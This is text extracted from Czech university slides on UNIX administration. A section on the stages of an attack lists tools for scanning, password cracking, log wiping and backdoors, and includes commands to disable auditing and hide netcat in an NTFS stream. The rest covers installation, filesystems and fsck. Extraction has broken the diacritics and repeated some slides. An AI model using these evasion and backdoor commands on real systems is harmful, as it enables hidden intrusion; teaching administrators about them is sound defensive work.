Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
UNIX
Administrace UNIXu Leo Galamboš
John the Ripper ˇ utilita na lámání hesel nejoblíbenejší inteligentní tvorba hintu˚
Administrativa Útoky Anatomie
Lokalizace Skenování
Modular Crypt Format (MCF) 1MD5/2BLF:Salt:Hash
ˇ rení der ˇ Proveˇ Získání pˇrístupu
root:$1$nLP5O79D$fghsiorn6wedie777:14201... halt:*:9797:0::::: operator:*:9797:0:::::
UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Sít’ová komunikace HTTP Suru attack proxy16 DP na MFF
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
16
http://www.sensepost.com/labs/tools/pentest/suru
Administrace UNIXu
MS-Windows získání hesel/hešu˚
Leo Galamboš Administrativa
pˇri fyzickém pˇrístupu (VM) – WinPE a
BartPE17
pwdump utility18 skrze priv. mode DLL injection lsass.exe – vyžaduje práva Administrátora
Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
Keš Local Security Authority
(LSA)19
hesla pro pˇrístup stroje k doméneˇ 10 posledních hešu˚ nalogovaných uživatelu˚ hesla služeb, ftp/www hesla, RAS úˇcty
MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver 17
http://www.nu2.nu/pebuilder/ 18 http://www.foofus.net/ 19 HKLM\SECURITY\Policy\Secrets
Administrace UNIXu
MS-Windows cracking
Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
ˇ Windows nemají salt a to usnadnuje útoky LM dává pouhých
237
heší (znaky jsou
SW: John21 , ntbf22 , Cain23 , LCP24 , ad.
uppercase)20
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
20
P. Oechslin (2003): prolomeno za 14 sekund. 21 http://www.openwall.com/john/ 22 http://www.toolcrypt.org/ 23 http://www.oxid.it/ 24 http://www.lcpsoft.com/
Zadní vrátka ˇ Záver
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
UNIX
Administrace UNIXu Leo Galamboš Administrativa
Instalace rootkitu25 trojan: zmodifikovaný program login, ps,. . .
Útoky Anatomie
Lokalizace Skenování
back-door inetd nebo webapp
ˇ rení der ˇ Proveˇ
sniffery: dsniff, wireshark,. . .
Získání pˇrístupu
cˇ istiˇc logu: logclean-ng
UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX
Rathole a.k.a. rat – hole
MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver 25
http://packetstormsecurity.org/UNIX/penetration/ rootkits/
MS-Windows
Administrace UNIXu Leo Galamboš Administrativa Útoky
vypnutí auditu auditpol /disable (Resource Kit) ˇ Event logu elsave26 vyˇcištení zakrytí souboru˚ hidden pˇríznak alternate data streams (NTFS) odhalí sfind27
Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu
> cp nc.exe enemyterritory.exe:nc.exe > start enemyterritory.exe:nc.exe
UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver 26 27
http://www.ibt.ku.dk/jesper/Windowstools http://www.foundstone.com/
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
MS-Windows
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
netcat poslouchá na portu a po pˇripojení spustí proces, napˇr. cmd.exe psexec využívá pˇrímo SMB
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Back-door payloads nabízí i Metasploit WinVNC fpipe pro redirekci TCP spoju˚
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Pouˇcení administrátovo
Administrace UNIXu Leo Galamboš
IP adresa útoˇcníka je cˇ asto falešná do veˇrejných bází vkládejte jen nutné údaje provozujte jen protokoly, kterým rozumíte (ICMP tunel) neposkytujte zbyteˇcneˇ cˇ ísla verzí software
Administrativa Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
pravidelneˇ aktualizujte (BIND, exploity) instalujte jen nezbytný software (telnet, nc?)
MS-Windows
Posílení pˇrístupu UNIX MS-Windows
ˇ vyžaduje dohled IDS není všelék, rovnež vyžadujte kvalitní hesla separujte servery a klienty (napˇr. via DMZ)
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
servery bez shell pˇrístupu (exploit ring-0, LKM)
Zadní vrátka
správné nastavení FW – omezte i odchozí tok
ˇ Záver
Administrace UNIXu Leo Galamboš
ˇ ˇ rit? Cemu lze skuteˇcneˇ v IS/IT veˇ — Niˇcemu, nemáte-li kvalitní bezpeˇcnostní politiku
Administrativa Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ
Lze se ochránit? ˇ — Ano, s velkým štestím a pedantským pˇrístupem
Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX
Co když meˇ dostanou? — Máte obrovskou pˇríležitost pochopit jak k tomu došlo
MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
ˇ Cást II
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
Instalace a základní obsluha
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Obsah
Administrace UNIXu Leo Galamboš
11
Instalace
Instalace Pˇred instalací Instalace Po instalaci
12
Souborové systémy
Souborové systémy Minix Filesystem ext2
13
ˇ Behové úrovneˇ OS
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS
14
Instalace software
Start OS Vypnutí OS *BSD OpenBSD
15
Správa uživatelu˚
SystemV Nová vlna
Instalace software
16
Dodatky
Správa uživatelu˚ Dodatky Cviˇcení
17
Cviˇcení
ˇ základních parametru˚ Pˇred instalací: zjištení
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2
poˇcet uživatelu˚ ⇒ HW specifikace ˇ nasazení ⇒ rozdelení disku parametry síteˇ
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Instalace
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy
ˇ rozdelení na diskové oblasti formátování
Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
konfigurace síteˇ instalace systémových balíku˚
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
základní konfigurace systému
OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Instalace OpenBSD 4.5
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky
ˇ pro pˇrehrání videa Kliknete
Cviˇcení
Po instalaci
Administrace UNIXu Leo Galamboš Instalace
kontrola konfigurace
Pˇred instalací Instalace Po instalaci
ˇ kontrola bežících procesu˚ ˇ rení velikosti podstromu˚ meˇ
Souborové systémy Minix Filesystem ext2
instalace (anti)rootkit nástroju˚
Další vývoj fsck Benchmark Linuxu
Pomucky ˚ — OpenBSD fstat(1) otevˇrené soubory
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD
ˇ ps(1) bežící procesy
SystemV Nová vlna
netstat(1) otevˇrené sockety
Instalace software
sysctl(8) parametry kernelu
Správa uživatelu˚
pstat(1) systémové položky
Dodatky Cviˇcení
Unix a souborové systémy
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem
jeden souborový strom
ext2
Virtual File System (VFS) pro pˇripojení více typu˚ FS
fsck
ˇ metadat jsou typicky žurnálový FS: zmeny 28 atomické
Další vývoj
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
28
unlink(1), mkdir(1), rmdir(1). . .
Unix a souborové systémy – speciality
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
sparse files: soubory s dírami po lseek(3) souˇcet velikostí souboru˚ muže ˚ pˇresáhnout kapacitu disku skuteˇcná velikost viz du(1)
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
snapshot: “konzistentní” snímek FS následneˇ modifikovaný puvodní ˚ obsah se ukládá ve sparse file na dalším FS snímek (napˇr. /dev/fssnap/xyz) lze RO/RW mountovat a dodateˇcneˇ studovat cˇ i zálohovat ˇ výhody: zajišt’uje konzistenci dat behem zálohování
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Inody
Leo Galamboš Instalace Pˇred instalací Instalace
atributy souboru: UID, GID, délka, cˇ as
Po instalaci
Souborové systémy
odkazy na datové bloky
Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
Struktura Adresáˇr Soubor Speciální soubor Roura, socket Symbolický link
Poˇcet inodu˚ 1 1 1 1 1
Poˇcet datových bloku˚ N (obsah adresáˇre s odkazy na inody) N (dle délky souboru) 0 0 ˇ 1; 0 (je-li cíl zanesen v inode)
Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
ˇ Rozdelení a struktura disku
Leo Galamboš Instalace Pˇred instalací Instalace
/
/usr
/usr/local
Po instalaci
Souborové systémy
bin
bin
bin
dev
include
etc
ext2
lib
lib
fsck
root
local
sbin
sbin
sbin
share
usr
share
etc lib
Minix Filesystem
Další vývoj
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
tmp var
OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚
Filesystem Hierarchy Standard http: //www.pathname.com/fhs/pub/fhs-2.3.html
Dodatky Cviˇcení
ˇ Rozdelení disku
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
Správa disku
Instalace Po instalaci
diskové oddíly = pˇripojované svazky diskové oddíly skrze Volume Management
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
Pro každý podstrom se hodí jiný typ filesystému s jinými parametry. /
ext2, suid povolen, RO
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
/home
reiserfs, notail, suid zakázán, RW
bezpeˇcnost! ...
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Linux Gentoo
Leo Galamboš
Filesystem /dev/hda3 udev /dev/hda5 /dev/hda6 /dev/hda7 /dev/hda8 /dev/hda9 /dev/hda10 none
1K-blocks 125432 452044 5859784 977180 2930080 3906308 3906308 59316904 452044
Used Available Use% Mounted on 79300 46132 64% / 224 451820 1% /dev 4475476 1384308 77% /usr 36616 940564 4% /tmp 325552 2604528 12% /var 1096880 2809428 29% /opt 2437456 1468852 63% /home 26244260 33072644 45% /disk0 0 452044 0% /dev/shm
Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
OpenBSD 3.7
*BSD OpenBSD SystemV
Filesystem /dev/wd0a /dev/wd0h /dev/wd0g /dev/wd0f /dev/wd0d /dev/wd0e
512-blocks 513628 1800580 1027420 513692 2061100 2061100
Used 55640 4 4 4 1013688 14344
Avail Capacity 432308 11% 1710548 0% 976048 0% 488004 0% 944360 52% 1943704 1%
Mounted on / /disk0 /home /tmp /usr /var
Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Logical Volume Management
Administrace UNIXu Leo Galamboš
Základní filosofie
Instalace Pˇred instalací Instalace
odbourání pˇrímé vazby mezi blokem FS a fyzickým blokem na disku ˇ mezivrstva umožnuje pˇridávání a odebírání disku, ˚ ˇ podporu pro nekteré typy RAID
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
fyzické disky jsou slouˇceny do Volume Group Logical volumes se alokují z Volume Group
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
Výhody ˇ velikost používaných logických oblastí (LV) lze menit
OpenBSD SystemV Nová vlna
Instalace software
možnost pˇrístupu skrze pojmenované oddíly, nikoliv fyzická oznaˇcení diskových zaˇrízení
Správa uživatelu˚
ˇ snadná výmena disku, ˚ pˇresuny diskových oddílu˚
Cviˇcení
Dodatky
Administrace UNIXu
Typický UFS
Leo Galamboš Instalace Cylinder Group 0
Cylinder Group 1
Cylinder Group n
Pˇred instalací Instalace Po instalaci
ˇ c (Boot block) Zavadeˇ
Souborové systémy
Datová oblast Info o fs (Super block)
Minix Filesystem
Datová oblast Cylinder Group Map
Info o fs (Super block)
ext2 Další vývoj fsck Benchmark Linuxu
i-nodes
ˇ Behové úrovneˇ OS
Cylinder Group Map
Start OS Vypnutí OS *BSD
i-nodes
Info o fs (Super block)
OpenBSD SystemV Nová vlna
Cylinder Group Map Datová oblast
Instalace software Správa uživatelu˚
Datová oblast
i-nodes
Dodatky Cviˇcení
Datová oblast
ˇ Císlování inod
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací
1
bad block i-node
2
root i-node
3
acl index i-node
4
acl data i-node
5
boot loader i-node
6
undelete directory i-node
7
rezervováno
Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
8
rezervováno
OpenBSD SystemV Nová vlna
Instalace software
9
rezervováno
Správa uživatelu˚
10
rezervováno
Dodatky Cviˇcení
Softwarové prostˇredky
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
inicializace mkfs(8), newfs(8) pˇripojení mount(8)
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
modifikace tune2fs(8), extendfs(8), growfs(8) odpojení umount(8)
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
opravy fsck(8) zálohování dump(8), restore(8)
*BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Historie Linuxu
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem
Linux zaˇcal s Minix FS (1980, Andrew S. Tanenbaum) adresy bloku˚ jsou jen 16b cˇ ísla ⇒ 64MB svazky názvy souboru˚ jen 14 znaku˚ adresáˇre s pevným poˇctem položek
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Minix FS
Leo Galamboš Instalace
ˇ c (Boot blok) Zavadeˇ
Pˇred instalací Instalace
Info o filesystému (Super block)
Po instalaci
Souborové systémy
0/1 bitová mapa inodu˚
Minix Filesystem ext2 Další vývoj
0/1 bitová mapa zón
fsck
2 Oblast inodu˚
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD
1
OpenBSD SystemV Nová vlna
Datová oblast
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
1 2
je pˇríslušná zóna obsazena? je pˇríslušná inoda živá?
Historie Linuxu
Administrace UNIXu Leo Galamboš
ˇ lepšího (ext fs) V dubnu 1992 vznikl první pokus o neco
Instalace Pˇred instalací Instalace
zvládne 2GB soubor i svazek názvy souboru˚ do 255 znaku˚
Po instalaci
Souborové systémy Minix Filesystem ext2
Kritika ext fs 1
2
spojový seznam drží volné bloky a inody, cˇ asem je ˇ a nastává degradace výkonu nesetˇrídený není solidní podpora pro cˇ asové znaˇcky, . . .
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV
VFS v kernelu zjednodušuje pˇridávání dalších FS
Nová vlna
Instalace software
Chris Provenzano (autor)
Správa uživatelu˚
Linus Torvalds (rewrite)
Dodatky
Duležitý ˚ základ pro existenci více FS v rámci systému.
Cviˇcení
Vnitˇrní struktura Linuxu (kernel space)
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace
Rozhraní systémových volání
Po instalaci
Souborové systémy Minix Filesystem ext2
Inodová keš
VFS
Adresáˇrová keš
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
Implementace FS
Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Buffer keš
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Ovladaˇc diskového zaˇrízení
Administrace UNIXu
Následníci ext fs: Xia a ext2
Leo Galamboš
Xia
Instalace
založeno na Minixu
Pˇred instalací Instalace
podpora pro dlouhé názvy souboru˚ (248 znaku) ˚ a ˇ svazky (2GB) vetší
Po instalaci
Souborové systémy Minix Filesystem
podpora pro tˇri cˇ asové znaˇcky
ext2 Další vývoj
Ext2 (leden 1993, Rémy Card) dovoluje navíc
fsck Benchmark Linuxu
ˇ promennou velikost bloku (1kB, 2kB, 4kB)
ˇ Behové úrovneˇ OS Start OS
rozšiˇritelnost FS Minix Ext Xia Ext2
Svazek 64MB 2GB 2GB 4TB
Vypnutí OS *BSD
Soubor 64MB 2GB 64MB 2GB
NázevS 14 255 248 255
Blok pevný pevný pevný var
(Jedná se o stav v roce 1993)
ˇ 3Cas ne ne ano ano
OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Struktura ext2
Leo Galamboš
ˇ c (Boot sektor) Zavadeˇ První skupina bloku˚ Druhá skupina bloku˚ ...
Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2
N-tá skupina bloku˚
Další vývoj fsck Benchmark Linuxu
Super block Deskriptory FS Bitová mapa bloku˚ Bitová mapa inodu˚
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software
Oblast inodu˚
Správa uživatelu˚
Oblast bloku˚
Dodatky
Velice podobná FFS z BSD (cylinder group FFS odpovídá blocks group ext2)
Nebezpeˇcí pˇretížení jednoho z disku˚ v RAID!
Cviˇcení
Bloky v ext2
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace
Velký blok Zrychluje I/O (je zapotˇrebí méneˇ I/O žádostí), ale ˇ jen 1/2 naplnení ˇ ⇒ poslední blok souboru má v prum ˚ eru ˇ plýtvání kapacitou pˇri velkém poˇctu malých souboru˚ vetší (news/mail servery).
Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
Malý blok ˇ Pomalejší I/O (závisí od cache), i když nekteré problémy ˇreší prealokace kdy ext2 standardneˇ prealokuje 8 bloku. ˚ Nevýhodné pˇri obrovských souborech (obrazy CD/DVD).
*BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Specifika ext2
Administrace UNIXu Leo Galamboš Instalace
V super-bloku kernel zapisuje stavy svazku “not clean” pˇri R/W pˇripojení svazku “clean” pˇri pˇrepojení na R/O nebo odpojení ˇ porušení konzistence “erroneous” pˇri zjištení
Pˇred instalací Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck
poˇcet R/W pˇripojení, cˇ as posledního fsck využívá se pˇri startu pro kontroly svazku
Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
Cíl symlinku kratší jak 60 znaku˚ je v inodeˇ
*BSD OpenBSD SystemV Nová vlna
Instalace software
tune2fs(8) je schopen pˇri nastavení “erroneous” spustit nic, pˇrepojit na R/O, kernel panic s rebootem na checker
Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Ext ˇrada Linuxových FS
Leo Galamboš Instalace Pˇred instalací
FS Ext2 Ext3 Ext4
Rok 1993 2001 2008
Svazek 32TB 32TB 1024PB
Soubor 2TB 2TB 16TB
Žurnál ne ano/ne? ano/ne
Instalace Po instalaci
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS
Kompatibilita
*BSD OpenBSD SystemV
ext2-ext3: tune2fs -j /dev/sda3 ext3-ext4: tune2fs -O extents,uninit_bg,dir_index /dev/sda3 fsck.ext4 -yfD /dev/sda3
Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Nová generace
Administrace UNIXu Leo Galamboš
Rodina Ext (+XFS) tradiˇcní design 90. let
Instalace Pˇred instalací Instalace Po instalaci
nepodporuje snapshoty LVM, RAID je až další vrstva
Souborové systémy Minix Filesystem ext2
ZFS (ˇcásteˇcneˇ i BTRFS) koncepˇcneˇ jiný pˇrístup: velká data, výpadky disku˚
Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS
zaintegrovaní LVM-RAID-like podpory
Start OS
R/W cache via SSD, komprese, deduplikace
*BSD
Vypnutí OS
OpenBSD SystemV
výkon horší jak u ext4 (DB nasazení) - muže ˚ se ˇ zmenit? Distribuované pro clustery BigData nasazení mnoho klientu, ˚ velké bloky a proudy dat
Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Administrace UNIXu
Opravy s fsck(8)
Leo Galamboš Instalace Pˇred instalací Instalace
ˇ automatické spouštení: pˇri každém N-tém pˇripojení svazku; každých N dní
Po instalaci
Souborové systémy Minix Filesystem
po havárii: pˇrerušené el. napájení, systém zpanikaˇril, zniˇcené kritické struktury disku ˇ v 5-7 fázích, které na sobeˇ závisí typicky beží
ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS
kontrola názvu˚ souboru˚
Vypnutí OS *BSD
Super block/FS je nakonec oznaˇcen jako “ˇcistý” fsck(8) standardneˇ pˇreskakuje
“ˇcisté”29
FS
OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
29
ˇ buffer-cache a Každý zápis zneˇcistí FS, pˇri vyprázdnení ˇ cˇ istým. provedení všech zápisu˚ se stává opet
Opravy s fsck(8)
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Super block modifikován po každém zápisu do FS, periodicky sync-ován pˇri poškození je nutné použít záložní30 Kontrola inodu˚ volné bloky nepoužívá žádná inoda
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV
korektní obsah: velikost souboru, ˚ poˇcet vazeb. . .
Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
30
fsck -b ..., viz napˇríklad mke2fs -n ...
Fáze 0 – inicializace fsck(8)
Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci
Problém Pokud jsou chyby ješteˇ pˇred fází 1, pak je typicky poškozen super block.
Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Rešení Nezbývá než použít záložní super block, jehož pozici (pokud ji nevíme) lze zjistit z formátovacího dry-run nad konkrétním diskovým oddílem se stejnými parametry jako v dobeˇ instalace.
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna
Instalace software Správa uživatelu˚ Dodatky Cviˇcení
Fáze 1: Kontrola bloku˚ a velikostí
Administrace UNIXu Leo Galamboš
UNKNOWN FILE TYPE I=XXXX (CLEAR) ˇ Mužete Chybný záznam typu souboru v inode. ˚ ponechat nebo vyˇcistit.
Instalace Pˇred instalací Instalace Po instalaci
Souborové systémy
PARTIALLY TRUNCATED INODE I=XXXX (SALVAGE) Inoda ukazuje na méneˇ datových bloku˚ než soubor. To ˇ není zásadní problém, nekonzistence vznikla behem zkracování souboru.
Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu
ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV
block BAD I=XXXX Inoda obsahuje cˇ íslo bloku, které je mimo povolené meze.
Nová vlna
